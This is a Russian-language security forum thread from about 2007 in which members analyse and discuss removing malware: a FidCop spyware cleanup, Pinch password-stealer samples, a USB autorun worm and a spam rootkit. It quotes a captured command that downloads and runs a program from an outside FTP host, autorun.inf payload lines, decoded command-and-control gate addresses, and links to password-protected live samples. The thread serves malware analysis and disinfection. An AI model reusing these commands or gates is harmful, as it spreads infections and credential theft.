В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

Kycok Caxapa
Инструкция по лечению твоего Г:

1. Restart in Safe mode (Hit F8 when Windows starts)
2. Delete the following file:
c:\windows\System32\ole16.dll
3. Open Start -> Run -> regedit.exe (and hit enter)
4. Go to:
[HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-
000000000046}\InProcServer32]
5. Replace: (default)=”ole16.dll” with (default)=”shell32.dll”
and
ThreadingModel=”Both” with ThreadingModel=”Apartment”
6. Go to:
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021401-
0000-0000-C000-000000000046}\InProcServer32]
7. Replace: (default)=”ole16.dll” with (default)=”shell32.dll”
and
ThreadingModel=”Both” with ThreadingModel=”Apartment”
8. Delete all files from all the Temp directories.
9. Run AntiSpyRemoval_Spyware.FidCop.A_EN.exe

1a14_29.11.2007_CRACKLAB.rU.tgz - AntiFidCop.zip

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Ara Думаете если чел спрашивает как смотреть отчет троя(пинч) т.е даже поиск не рулит то че спрашивается не выкладывать отчеты. все равно не смогут. обо не умеют.
[HEX] давай в приват отчеты. либо пусть модеры там по рангу дают просмотр таких тем. там 200 ранг. либо отдельный подфорум. к взлому и реверсингу то относится значит не противоречит тематике форума. Либо к АДМИНУ!!!

| Сообщение посчитали полезным:

Не понимаю смысла подфорума, где один будет реверсить и выкладывать для юзверей чужие пассы. Мне лично это не нравится, а вы сами думайте, выносите предложение, топик для предложений есть.

| Сообщение посчитали полезным:

Ara
Согласен. Не совсем этично получается. У кого то может горе с утерей особо личной инфы, а мы тут её раскидываем по всему инету.
У кого мозг есть, тот и сам сумеет по выложеной инфе разобраться что к чему.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

+1 нефиг.
я уже говорил об этом: воруя пароли с отчётов мы уподабливаемся тем же зловредам.
довайте противодействовать им путём убиения ящиков с отчётами и саёнтов с гейтами.

-----
AutoIt

| Сообщение посчитали полезным:

-1 потому что я отреверсил этого тройана, а некто зашёл на ящик и УБИЛ все отчёты на серваке. Это называется вандаллизмом

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

Это называется нормальным пониманием вещей. Респект тому товарищу.

| Сообщение посчитали полезным:

HandMill
Кстати Пинч и реверсить не надо (и так известно что он делает). Достаточно на виртуалке запустил и трафик сетевой записать в котором все обращения к мылу или гейту как на ладони будут.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
Кстати Пинч и реверсить не надо (и так известно что он делает). Достаточно на виртуалке запустил и трафик сетевой записать в котором все обращения к мылу или гейту как на ладони будут.
Глупо. Да и крипторы, на нем обычно висят, не из лучшых, так что отреверсить особого труда не составляет.

-----
– Почему ты работаешь по ночам ? – Так удобнее... В одну смену с чертями...

| Сообщение посчитали полезным:

tnt17
Смотря с какой стороны смотреть. Если в плане аутотренинга в реверсе, то согласен что глупо, а если нужен результат как можно быстро и без заморочек, то это вполне нормальный вариант.

Сначала и я реверсил пинчи накрытые всяким самопальным говном и щас уже нареверсился. Так что щас использую такую методу и пока метода не подводила.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

заметил тут как то в процессах висит cmd.exe а в командной строке у него

cmd /k echo open c0re.myftp.biz 1981 > o&echo user 1 1 >> o &echo get update5865.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &update5865.exe

| Сообщение посчитали полезным:

кому интересно гляньте червячка)
на флешку залез..
пароль : 1

744a_03.12.2007_CRACKLAB.rU.tgz - autorun.inf.rar

-----
AutoIt

| Сообщение посчитали полезным:

OLEGator даже смотреть не буду. Просто уверен, что это VBS Igidak - он создаёт на твоей флешке не только autorun.inf, а ещё кучу всяких расширений присваивает имени autorun. Для самораспространения использует VB Script - autorun.vbs для автоматического запуска использует autorun.inf - когда открываешь директорию с червяком в Explorer'е, то срабатывает автозапуск (по принципу как на CD дисках). Автозапуска можно избежать изменив ключик в реестре, либо используя альтернативные проводники. Эти файлы имеют аттрибуты скрытый и системный. Что б увидить их в проводнике нужно нажать в меню Сервис - // - Свойства папки - // вкладка "Вид" и снимаешь галку с "Скрывать защищённые системные файлы" и выбираешь "Показывать скрытые файлы и папки". Эту опцию активирует этот червяк. Впервые я с ним столкнулся где-то пол-года назад. Очень распространённая зараза среди пользователей кто юзает антивирусы со старыми базами.

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

мой нод сказал: Win32/Sohanad.NAK чepвь
фишка в том, что для защиты от афторан вирусов на флешке я создал папку с именем autorun.inf
и уже autorun.inf файл создаваться не может.
А этя тварь сидела в нутри этой папки и имела значёк папки и имя папки, пакована UPX + рядом авторан инф файл с содержимым:
[Autorun]
Open=SSVICHOSST.exe
Shellexe cute=SSVICHOSST.exe
Shell\Open\command=SSVICHOSST.exe
Shell=Open

-----
AutoIt

| Сообщение посчитали полезным:

HandMill
Чуток промахнулся. С Игидаком сам сталкивался и там ничего сложного нету. Просто тело распространяет само себя и правит чуток реестр.

Этот же вирь индефицируется как Win32.HLLW.Texmer.38
Вот лог анализа
analysis.seclab.tuwien.ac.at/result.php?taskid=9c0546a68430726491da98cc20f0d7dc
Из него видно что каждое утро по расписанию стартует файлег SSVICHOSST.exe
И ко всему в добавок апдейтиться через инет.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

класный анализ)
и подробно как.
хороший сайтенг буду знать

-----
AutoIt

| Сообщение посчитали полезным:

Вот и я наконец решил присоединиться к такому интереснейшему занятию как дебаг говнопенчей =)
Вот нарыл один экземпляр только расшифровать имя хоста и мыла куда отчеты идут у меня не вышло....а криптор снялся на ура. Кстати пинч походу приватный, ибо больно много он всего угоняет....вплоть до акков к рапиде (если я правильно понял, ибо он обращается или ищет файлы rapidshare.txt) и не только это.

-----
бессмысленные манипуляции не становятся более разумными если их повторять

| Сообщение посчитали полезным:

SecurAdmin пишет:
а криптор снялся на ура
У мну чето не выходит upack снял, потом какой-то самопал походу
Вот тут: 00401082 CALL DWORD PTR DS:[40C05A] непонятно, по адресу 40C05A одни нули, короче кал в никуда.

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Я его целиком не снимал, просто довел до того состояния, чтобы строки расшифровались =)

-----
бессмысленные манипуляции не становятся более разумными если их повторять

| Сообщение посчитали полезным:

SecurAdmin, вот что мне удалось вытянуть:

13176FFD 00 00 00 59 6B 52 46 64 56 6B 7A 62 47 6C 4E 4D ...YkRFdVkzbGlNM
1317700D 30 6F 32 54 47 30 35 65 56 70 33 50 54 30 3D 00 0o2TG05eVp3PT0=.
1317701D 50 4F 53 54 20 2F 7A 67 61 74 65 2E 70 68 70 20 POST /zgate.php

YkRFdVkzbGlNM0o2TG05eVp3PT0= - Явно Base64. Декодируем http://ostermiller.org/calc/encode.html два раза и получаем:
1.cyb3rz.org
гейт: /zgate.php

Мыло так и не расшифровал:

1317710D 0D 0A 0D 0A 61 3D 30 78 ....a=0x
1317711D 34 33 64 30 66 73 73 64 39 77 36 38 63 36 37 38 43d0fssd9w68c678
1317712D 61 73 36 64 73 61 38 64 61 40 6D 61 69 6C 2E 72 as6dsa8da@mail.r
1317713D 75 33 33 33 26 62 3D 50 69 6E 63 68 5F 72 65 70 u333&b=Pinch_rep
1317714D 6F 72 74 26 64 3D 25 73 26 63 3D 00 72 65 70 6F ort&d=%s&c=.repo
1317715D 72 74 2E 62 69 6E rt.bin

0x43d0fssd9w68c678as6dsa8da - что эт за крипт такой?

Только мне кажется, что сейчас "cyb3rz.org" вообще мёртвый ... или я ошибаюсь? Пароль на мыло в этой версии пинча кажется не юзается вообще.

-----
все багрепорты - в личные сообщения

| Сообщение посчитали полезным:

Довольно интересная статья:
www.viruslist.com/ru/analysis?pubid=204007578

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

HandMill пишет:
Пароль на мыло в этой версии пинча кажется не юзается вообще
Так это гейтовая версия, пароль там и не нужен

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

Вот вам интересная зверюга.
Пароль: vir

17d8_04.12.2007_CRACKLAB.rU.tgz - wBHTGf.rar

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx
руткит. надо поподробнее расмотреть его на VM.

тянет 3 файла в одном флаконе hxxp://208.66.195.71/40e8001430303030303030303030303030303030303031306 c0000002a6600000000


Инжектятся в IE и шлют спам (возможно еще что то есть).
По методе и содержимому очень сильно похоже на это
www.geocities.jp/kiskzo/main.sys.html

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Как у вас тут любят писать - гавнопинч в архиве ). По криптованный криптером, который на данный момент весьма популярен. Есть антиэмуляция.
пасс - qwerty

4ccb_04.12.2007_CRACKLAB.rU.tgz - EC07494CC3336C5F8DFEF228EB562EC4.rar

| Сообщение посчитали полезным:

[HEX]

Кстати в упаковке прожка с знакомой стрингой: 13141724=13141724 (ASCII "Poshel-ka ti na hui drug aver")
Local call from 1314A6A9

(:

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

[HEX] пишет:
Styx
руткит. надо поподробнее расмотреть его на VM.

тянет 3 файла в одном флаконе hxxp://208.66.195.71/40e8001430303030303030303030303030303030303031306 c0000002a6600000000


Инжектятся в IE и шлют спам (возможно еще что то есть).
По методе и содержимому очень сильно похоже на это
www.geocities.jp/kiskzo/main.sys.html
Этот руткит уже всех заипал. Один из массовых спамеров. Универсальный спамбот. Это только лодер. Загружает в память ip6fw для обхода хипс-систем путем восстановления SSDT. runtime.sys - для маскировки IE, в который идет инжект. Загружается замусоренный дроппер (по этолй ссылке), расшифровка и запуск из теспа. Регистрирутестя и загружается runtime2.sys - спамер. Является фильтром - его никто из антивирей не удалит (почти ;)). Плюс полиморф криптер - чтобы лодеры не палились, антиэмуляция/антиэвристика плюс руткит - почти все антивири беспомощны перед этой хренью. Даже не много бореется против антируткитов - восстановка своих хуков.

| Сообщение посчитали полезным:

berv
Да я уже все посмотрел
Все точь в точь. Особо ничего интересного в нем нет =\ А жаль.

Styx
Ну видать одна группа на заказ пишет говно всякое. Или какой то конструктор по рукам пошел. Вот послание и пихается во всю заразу.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

berv пишет:
Как у вас тут любят писать - гавнопинч в архиве ). По криптованный криптером, который на данный момент весьма популярен. Есть антиэмуляция.
пасс - qwerty

Trojan.PWS.LDPinch.1941
гейт тут pinch.100webspace.net/uycgeouycgouycgoer/gate.php

еще не встречал такого криптора, мусора всякого в код напихал

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным:

--> unEbookEdit v2.6 <-- http://www.etextwizard.com/download/uneep/uneepsetup.exe (976Kb)
при инсталле drweb ругается на троя unEbookEdit\is-AM5KE.tmp - Infiziert mit Trojan.PWS.Gamania.4223, при запуске прога ломится в инет типа обновляться и без "обновления" не запускается... Довольно странное поведение для распаковщика книг...
Там правда трой?

-----
z+Dw7uLu5+jqLCDq7vLu8PvpIPHs7uMh

| Сообщение посчитали полезным: